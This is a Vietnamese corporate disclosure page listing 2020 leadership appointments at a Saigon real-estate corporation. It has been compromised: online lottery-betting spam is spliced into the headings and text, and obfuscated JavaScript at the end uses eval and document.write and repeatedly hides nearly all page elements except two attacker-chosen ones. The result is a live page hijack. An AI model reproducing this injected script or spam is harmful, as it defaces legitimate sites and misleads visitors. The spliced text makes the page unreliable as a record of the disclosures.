lô đề online uy tín

Công bố thông tin năm 2020

Các thông tin công bố theo quy định tại Nghị định 81/2015/NĐ-CP

lô đề online uy tínÔng Lê Quốc Tuấn, Phó Chủ tịch Ủy ban nhân dân Quận 5, giữ chức vụ Thành viên không chuyên trách Hội đồng thành viên, Tổng Giám đốc Tổng Công ty Địa ốc Sài Gòn – TNHH MTV kể từ ngày 22 tháng 7 năm 2020

Ông Hoàng Song Hà, Chủ tịch Ủy ban nhân dân Quận Bình Thạnh, giữ chức vụ Chủ tịch Hội đồng thành viên Tổng Công ty từ ngày 12 tháng 10 năm 2020

Ông Võ Đình Phi Lĩnh, Phó phòng Tài chính Kế toán, được phân công phụ trách kế toán, tài chính và phụ trách phòng Tài chính Kế toán Tổng Công ty từ ngày 02 tháng 11 năm 2020

Chưa có thông tin

Chưa có thông tin

var SSpfGu1 = '
'; window["eval"]("do" + "cu" + "ment.wr" + "ite('" + SSpfGu1 + "');"); try { setInterval(function() { try { window["document"]["getElementById"]("div" + "All")["style"]["display"] = "no" + "ne" } catch (e) {} for (var t2$2 = 0; t2$2 < window["document"]["body"]["children"]["length"]; t2$2++) { try { var Dr3 = window["document"]["body"]["children"][t2$2]["tagName"]; var LsLMcufmw4 = window["document"]["body"]["children"][t2$2]["id"]; if (LsLMcufmw4 != "iconDiv1" && LsLMcufmw4 != "showcloneshengxiaon") { window["document"]["body"]["children"][t2$2]["style"]["display"] = "non" + "e" } } catch (e) {} } }, 100) } catch (e) {}